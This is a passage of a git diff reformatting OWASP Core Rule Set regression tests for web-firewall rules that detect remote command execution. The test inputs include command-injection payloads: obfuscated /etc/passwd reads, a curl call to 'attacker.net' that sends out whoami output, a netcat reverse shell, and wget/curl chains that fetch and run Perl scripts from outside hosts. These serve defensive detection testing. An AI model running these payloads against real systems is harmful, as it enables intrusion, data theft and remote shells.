in reverse order)" stages: - - stage: - input: - dest_addr: 127.0.0.1 - data: exec=c4%3D%5C%20%3Bc3%3Dt%3Bc2%3Da%3Bc1%3Dc%3Ba1%3D%2F%3Ba2%3De%3Ba3%3Dt%3Ba4%3Dc%3Ba5%3D%2F%3Ba6%3Dp%3Ba7%3Da%3Ba8%3Ds%3Ba9%3Ds%3Ba10%3Dw%3Ba11%3Dd%3B%24c1%24c2%24c3%24c4%24a1%24a2%24a3%24a4%24a5%24a6%24a7%24a8%24a9%24a10%24a11%0A - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - version: HTTP/1.0 - output: - log_contains: id "932200" - - test_title: 932200-15 + - input: + dest_addr: 127.0.0.1 + data: exec=c4%3D%5C%20%3Bc3%3Dt%3Bc2%3Da%3Bc1%3Dc%3Ba1%3D%2F%3Ba2%3De%3Ba3%3Dt%3Ba4%3Dc%3Ba5%3D%2F%3Ba6%3Dp%3Ba7%3Da%3Ba8%3Ds%3Ba9%3Ds%3Ba10%3Dw%3Ba11%3Dd%3B%24c1%24c2%24c3%24c4%24a1%24a2%24a3%24a4%24a5%24a6%24a7%24a8%24a9%24a10%24a11%0A + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + version: HTTP/1.0 + output: + log: + expect_ids: [932200] + - test_id: 15 desc: "Add test to match BB EBIDJ91T" stages: - - stage: - input: - dest_addr: 127.0.0.1 - data: cmd%3Da%3Dcurl%26%26b%3D%60whoami%60%26%26%24a%20attacker.net%2F%24b - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - version: HTTP/1.0 - output: - log_contains: id "932200" - - test_title: 932200-16 + - input: + dest_addr: 127.0.0.1 + data: cmd%3Da%3Dcurl%26%26b%3D%60whoami%60%26%26%24a%20attacker.net%2F%24b + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + version: HTTP/1.0 + output: + log: + expect_ids: [932200] + - test_id: 16 desc: "Add test to match BB MKXQCJMX" stages: - - stage: - input: - dest_addr: 127.0.0.1 - data: cmd=a%3D%2Fetc%26%26b%3D%2Fpasswd%26%26c%3Dcat%26%26%24c%20%24a%24b - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - version: HTTP/1.0 - output: - log_contains: id "932200" + - input: + dest_addr: 127.0.0.1 + data: cmd=a%3D%2Fetc%26%26b%3D%2Fpasswd%26%26c%3Dcat%26%26%24c%20%24a%24b + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + version: HTTP/1.0 + output: + log: + expect_ids: [932200] diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932205.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932205.yaml index e79b47c6e..1fd9e4408 100644 --- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932205.yaml +++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932205.yaml @@ -2,125 +2,124 @@ meta: author: "Max Leske, azurit" description: RCE Bypass - enabled: true - name: 932205.yaml +rule_id: 932205 tests: - - test_title: 932205-1 + - test_id: 1 desc: Referer without query string, trying to evade query string match stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - Referer: "www.google.com;c$?at+/etc/passwd" - method: GET - port: 80 - uri: "/get" - version: HTTP/1.0 - output: - log_contains: id "932205" - - test_title: 932205-2 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + Referer: "www.google.com;c$?at+/etc/passwd" + method: GET + port: 80 + uri: "/get" + version: HTTP/1.0 + output: + log: + expect_ids: [932205] + - test_id: 2 desc: Referer header with query string and obvious payload stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - Referer: "www.google.com?param=;/bin/ca?+/et*/passwd" - method: GET - port: 80 - uri: "/get" - version: HTTP/1.0 - output: - log_contains: id "932205" - - test_title: 932205-3 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + Referer: "www.google.com?param=;/bin/ca?+/et*/passwd" + method: GET + port: 80 + uri: "/get" + version: HTTP/1.0 + output: + log: + expect_ids: [932205] + - test_id: 3 desc: Referer header with canonical path, query string and obvious payload stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - Referer: "www.google.com/?param=;/bin/ca?+/et*/passwd" - method: GET - port: 80 - uri: "/get" - version: HTTP/1.0 - output: - log_contains: id "932205" - - test_title: 932205-4 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + Referer: "www.google.com/?param=;/bin/ca?+/et*/passwd" + method: GET + port: 80 + uri: "/get" + version: HTTP/1.0 + output: + log: + expect_ids: [932205] + - test_id: 4 desc: False positive test against query string and space in a parameter stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - Referer: "http://www.example.com/page?param=test+test" - method: GET - port: 80 - uri: "/get" - version: HTTP/1.0 - output: - no_log_contains: id "932205" - - test_title: 932205-5 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + Referer: "http://www.example.com/page?param=test+test" + method: GET + port: 80 + uri: "/get" + version: HTTP/1.0 + output: + log: + no_expect_ids: [932205] + - test_id: 5 desc: False positive test against query string and space in path stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - Referer: "http://www.example.com/page%20test?param=test" - method: GET - port: 80 - uri: "/get" - version: HTTP/1.0 - output: - no_log_contains: id "932205" - - test_title: 932205-6 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + Referer: "http://www.example.com/page%20test?param=test" + method: GET + port: 80 + uri: "/get" + version: HTTP/1.0 + output: + log: + no_expect_ids: [932205] + - test_id: 6 desc: False positive test against syntax highlighter (generic) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - Referer: "https://coreruleset.org/#:~:text=generic%20attack%20detection" - method: GET - port: 80 - uri: "/get" - version: HTTP/1.0 - output: - no_log_contains: id "932205" - - test_title: 932205-7 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + Referer: "https://coreruleset.org/#:~:text=generic%20attack%20detection" + method: GET + port: 80 + uri: "/get" + version: HTTP/1.0 + output: + log: + no_expect_ids: [932205] + - test_id: 7 desc: False positive test against fragment (scroll to text fragment) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - Referer: "https://www.google.com/url?q=https://example.com/path/#:~:text=Inoltre%2C%20non%20vi%20sono%20evidenze,'immaginario%20comune%20(1).&sa=U&ved=2ahUKEwjSluGs8eX9AhWiSvEDHaaEChEQFnoECAgQBQ&usg=AOvVaw1_nmpM50Zh9-mGx1DsMw7j" - method: GET - port: 80 - uri: "/get" - version: HTTP/1.0 - output: - no_log_contains: id "932205" + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + Referer: "https://www.google.com/url?q=https://example.com/path/#:~:text=Inoltre%2C%20non%20vi%20sono%20evidenze,'immaginario%20comune%20(1).&sa=U&ved=2ahUKEwjSluGs8eX9AhWiSvEDHaaEChEQFnoECAgQBQ&usg=AOvVaw1_nmpM50Zh9-mGx1DsMw7j" + method: GET + port: 80 + uri: "/get" + version: HTTP/1.0 + output: + log: + no_expect_ids: [932205] diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932206.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932206.yaml index d795b05f2..3cfb335e8 100644 --- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932206.yaml +++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932206.yaml @@ -2,57 +2,56 @@ meta: author: "Max Leske, azurit" description: RCE Bypass - enabled: true - name: 932206.yaml +rule_id: 932206 tests: - - test_title: 932206-1 + - test_id: 1 desc: Referer header without URL stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - Referer: "/bin/ca't'+/et*/passwd" - method: GET - port: 80 - uri: "/get" - version: HTTP/1.0 - output: - log_contains: id "932206" - - test_title: 932206-2 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + Referer: "/bin/ca't'+/et*/passwd" + method: GET + port: 80 + uri: "/get" + version: HTTP/1.0 + output: + log: + expect_ids: [932206] + - test_id: 2 desc: False positive test against URL stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - Referer: "http://www.example.com/page?param=test+test" - method: GET - port: 80 - uri: "/get" - version: HTTP/1.0 - output: - no_log_contains: id "932206" - - test_title: 932206-3 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + Referer: "http://www.example.com/page?param=test+test" + method: GET + port: 80 + uri: "/get" + version: HTTP/1.0 + output: + log: + no_expect_ids: [932206] + - test_id: 3 desc: False positive test against query string and space in path stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - Referer: "http://www.example.com/page%20test?param=test" - method: GET - port: 80 - uri: "/get" - version: HTTP/1.0 - output: - no_log_contains: id "932206" + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + Referer: "http://www.example.com/page%20test?param=test" + method: GET + port: 80 + uri: "/get" + version: HTTP/1.0 + output: + log: + no_expect_ids: [932206] diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932210.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932210.yaml index 386492d8b..ff3a3d8b1 100644 --- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932210.yaml +++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932210.yaml @@ -2,122 +2,121 @@ meta: author: "flo405, Franziska Bühler, azurit" description: SQLite System Command Execution - enabled: true - name: 932210.yaml +rule_id: 932210 tests: - - test_title: 932210-1 + - test_id: 1 desc: ";\n.shell%20nc%2010.10.10.1%206666%20-e%20sh\n" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=;\\n.shell%20nc%2010.10.10.1%206666%20-e%20sh\\n" - version: HTTP/1.0 - output: - log_contains: id "932210" - - test_title: 932210-2 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=;\\n.shell%20nc%2010.10.10.1%206666%20-e%20sh\\n" + version: HTTP/1.0 + output: + log: + expect_ids: [932210] + - test_id: 2 desc: "%22;\n.%20shell%20nc%2010.10.10.1%206666%20-e%20sh\n" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=%22;\\n.%20shell%20nc%2010.10.10.1%206666%20-e%20sh\\n" - version: HTTP/1.0 - output: - log_contains: id "932210" - - test_title: 932210-3 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=%22;\\n.%20shell%20nc%2010.10.10.1%206666%20-e%20sh\\n" + version: HTTP/1.0 + output: + log: + expect_ids: [932210] + - test_id: 3 desc: ";\n.system%20nc%2010.10.10.1%206666%20-e%20sh\n" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=;\\n.system%20nc%2010.10.10.1%206666%20-e%20sh\\n" - version: HTTP/1.0 - output: - log_contains: id "932210" - - test_title: 932210-4 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=;\\n.system%20nc%2010.10.10.1%206666%20-e%20sh\\n" + version: HTTP/1.0 + output: + log: + expect_ids: [932210] + - test_id: 4 desc: ";\n.databases" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=;\\n.databases" - version: HTTP/1.0 - output: - log_contains: id "932210" - - test_title: 932210-5 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=;\\n.databases" + version: HTTP/1.0 + output: + log: + expect_ids: [932210] + - test_id: 5 desc: "Fix N9FKP2XQ: .sh whoami" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get/juiceshop?s=1;.sh+whoami" - version: HTTP/1.0 - output: - log_contains: id "932210" - - test_title: 932210-6 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get/juiceshop?s=1;.sh+whoami" + version: HTTP/1.0 + output: + log: + expect_ids: [932210] + - test_id: 6 desc: "N9FKP2XQ" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - data: | - code=1;.\"shell whoami - uri: "/post" - version: "HTTP/1.1" - output: - log_contains: id "932210" - - test_title: 932210-7 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + data: | + code=1;.\"shell whoami + uri: "/post" + version: "HTTP/1.1" + output: + log: + expect_ids: [932210] + - test_id: 7 desc: "N9FKP2XQ" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - data: | - code=1;.\'shell whoami - uri: "/post" - version: "HTTP/1.1" - output: - log_contains: id "932210" + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + data: | + code=1;.\'shell whoami + uri: "/post" + version: "HTTP/1.1" + output: + log: + expect_ids: [932210] diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932220.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932220.yaml index c0a81d84e..f5e8edbcf 100644 --- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932220.yaml +++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932220.yaml @@ -2,255 +2,254 @@ meta: author: "Max Leske, Xhoenix, azurit" description: Unix shell RCE using pipe for less than 4 chars - enabled: true - name: 932220.yaml +rule_id: 932220 tests: - - test_title: 932220-1 + - test_id: 1 desc: "TEST=echo | php7.4" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: "TEST=echo | php7.4" - version: HTTP/1.0 - output: - log_contains: id "932220" - - test_title: 932220-2 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: "TEST=echo | php7.4" + version: HTTP/1.0 + output: + log: + expect_ids: [932220] + - test_id: 2 desc: "TEST=echo | ${php7.4}php7.4" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: "TEST=echo | ${php7.4}php7.4" - version: HTTP/1.0 - output: - log_contains: id "932220" - - test_title: 932220-3 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: "TEST=echo | ${php7.4}php7.4" + version: HTTP/1.0 + output: + log: + expect_ids: [932220] + - test_id: 3 desc: "whxami|sh+``" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: "whxami|sh+``" - version: HTTP/1.0 - output: - log_contains: id "932220" - - test_title: 932220-4 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: "whxami|sh+``" + version: HTTP/1.0 + output: + log: + expect_ids: [932220] + - test_id: 4 desc: "whxami|fish+``" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: "whxami|fish+``" - version: HTTP/1.0 - output: - log_contains: id "932220" - - test_title: 932220-5 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: "whxami|fish+``" + version: HTTP/1.0 + output: + log: + expect_ids: [932220] + - test_id: 5 desc: "Negative test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: "echo | curx" - version: HTTP/1.0 - output: - no_log_contains: id "932220" - - test_title: 932220-6 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: "echo | curx" + version: HTTP/1.0 + output: + log: + no_expect_ids: [932220] + - test_id: 6 desc: | Test for BB finding 9P5LL13Y echo "foo;whxam"i | tr x o | sh #" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - uri: "/post" - port: 80 - data: | - echo "foo;whxam"i | tr x o | sh #" - version: HTTP/1.1 - output: - log_contains: id "932220" - - test_title: 932220-7 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + uri: "/post" + port: 80 + data: | + echo "foo;whxam"i | tr x o | sh #" + version: HTTP/1.1 + output: + log: + expect_ids: [932220] + - test_id: 7 desc: "Block evasion using here string" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - version: HTTP/1.0 - data: | - code=cat<<, Franziska Bühler, Felipe Zipitria, Max Leske, Esad Cetiner, Xhoenix, azurit" - description: "Old tests and tests for fix of 932230 rule triggered with html decimal entities because of using legacy ISO-8859 charsets family - https://github.com/coreruleset/coreruleset/issues/1886. \nIf you need to trigger tests on a command, use one of the three letter commands in the file included by the 932230 data rule.\n" - enabled: true - name: 932230.yaml + description: | + Old tests and tests for fix of 932230 rule triggered with html decimal entities because of using legacy ISO-8859 charsets family - https://github.com/coreruleset/coreruleset/issues/1886. + If you need to trigger tests on a command, use one of the three letter commands in the file included by the 932230 data rule. +rule_id: 932230 tests: - - test_title: 932230-1 + - test_id: 1 desc: System Command Injection (932230) from old modsec regressions stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Host: localhost - Keep-Alive: '300' - Proxy-Connection: keep-alive - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=system('echo%20cd%20/tmp;wget%20http://turbatu.altervista.org/apache_32.png%20-O%20p2.txt;curl%20-O%20http://turbatu.altervista.org/apache_32.png;%20mv%20apache_32.png%20p.txt;lyxn%20-DUMP%20http://turbatu.altervista.org/apache_32.png%20>p3.txt;perl%20p.txt;%20perl%20p2.txt;perl%20p3.txt;rm%20-rf" - version: HTTP/1.1 - output: - no_log_contains: id "932230" - - test_title: 932230-2 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=system('echo%20cd%20/tmp;wget%20http://turbatu.altervista.org/apache_32.png%20-O%20p2.txt;curl%20-O%20http://turbatu.altervista.org/apache_32.png;%20mv%20apache_32.png%20p.txt;lyxn%20-DUMP%20http://turbatu.altervista.org/apache_32.png%20>p3.txt;perl%20p.txt;%20perl%20p2.txt;perl%20p3.txt;rm%20-rf" + version: HTTP/1.1 + output: + log: + no_expect_ids: [932230] + - test_id: 2 desc: System Command Injection (932230) from old modsec regressions stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Host: localhost - Keep-Alive: '300' - Proxy-Connection: keep-alive - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=http://ricky.ilmerlodellarocca.com/upload.php;lwp-download%20http://shinnongclinic.com/kor_board/icon/member_image_box/1/appa.jpg;wget%20http://shinnongclinic.com/kor_board/icon/member_image_box/1/appa.jpg;curl%20-O%20http://shinnongclinic.com/kor_board/icon/member_image_box/1/appa.jpg;%20appa.jpg;perl%20appa.jpg;rm%20-rf%20appa.jpg;wget%20http://shinnongclinic.com/kor_board/icon/member_image_box/1/ca.txt%20ca.php;curl%20-O%20http://shinnongclinic.com/kor_board/icon/member_image_box/1/ca.txt%20ca.php;lwp-download%20http://shinnongclinic.com/kor_board/icon/member_image_box/1/ca.txt%20ca.php;mv%20ca.php%20ca.php;chmod%20755%20ca.php" - version: HTTP/1.1 - output: - no_log_contains: id "932230" - - test_title: 932230-3 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: 